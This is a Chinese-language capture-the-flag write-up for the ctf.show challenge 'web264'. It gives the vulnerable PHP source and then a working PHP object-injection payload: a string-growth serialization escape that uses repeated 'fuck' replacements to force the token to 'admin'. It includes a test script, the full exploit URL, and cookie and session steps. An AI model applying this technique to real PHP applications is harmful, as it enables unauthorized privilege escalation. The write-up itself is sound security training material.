web264

看源码

index.php

<?php



/*

# -*- coding: utf-8 -*-

# @Author: h1xa

# @Date:   2020-12-03 02:37:19

# @Last Modified by:   h1xa

# @Last Modified time: 2020-12-03 16:05:38

# @message.php

# @email: h1xa@ctfer.com

# @link: https://ctfer.com



*/





error_reporting(0);

session_start();



class message{

    public $from;

    public $msg;

    public $to;

    public $token='user';

    public function __construct($f,$m,$t){

        $this->from = $f;

        $this->msg = $m;

        $this->to = $t;

    }

}



$f = $_GET['f'];

$m = $_GET['m'];

$t = $_GET['t'];



if(isset($f) && isset($m) && isset($t)){

    $msg = new message($f,$m,$t);

    $umsg = str_replace('fuck', 'loveU', serialize($msg));

    $_SESSION['msg']=base64_encode($umsg);

    echo 'Your message has been sent';

}



highlight_file(__FILE__);

message.php

 <?php



/*

# -*- coding: utf-8 -*-

# @Author: h1xa

# @Date:   2020-12-03 15:13:03

# @Last Modified by:   h1xa

# @Last Modified time: 2020-12-03 15:17:17

# @email: h1xa@ctfer.com

# @link: https://ctfer.com



*/

session_start();

highlight_file(__FILE__);

include('flag.php');



class message{

    public $from;

    public $msg;

    public $to;

    public $token='user';

    public function __construct($f,$m,$t){

        $this->from = $f;

        $this->msg = $m;

        $this->to = $t;

    }

}



if(isset($_COOKIE['msg'])){

    $msg = unserialize(base64_decode($_SESSION['msg']));

    if($msg->token=='admin'){

        echo $flag;

    }

}

这题算是很正常的字符串增长逃逸

接着尝试构造pac

<?php

class message{

    public $from;

    public $msg;

    public $to;

    public $token='user';

    public function __construct($f,$m,$t){

        $this->from = $f;

        $this->msg = $m;

        $this->to = $t;

    }

}



$f = 'fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck";s:3:"msg";s:0:"";s:2:"to";s:0:"";s:5:"token";s:5:"admin";}';

$m = "1";

$t = '1';



if(isset($f) && isset($m) && isset($t)){

    $msg = new message($f,$m,$t);

    $umsg = base64_encode(str_replace('fuck', 'loveU', serialize($msg)));

    echo str_replace('fuck', 'loveU', serialize($msg))."\n";

}



$msg = unserialize(base64_decode($umsg));

echo serialize($msg)."\n";

if($msg->token=='admin') {

    echo "flag";

}

然后我们构造payload

http://20d2a029-7925-4085-aae1-9464ce91f0ad.challenge.ctf.show/?f=fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck";s:3:"msg";s:0:"";s:2:"to";s:0:"";s:5:"token";s:5:"admin";}&m=1&t=1

访问完index.php后，我们再访问message.php进行反序列化

注意访问message.php的时候需要传入一个msg的cookie，同时还要保留phpsessid，别把phpsessid丢了，丢了的话就会无法反序列化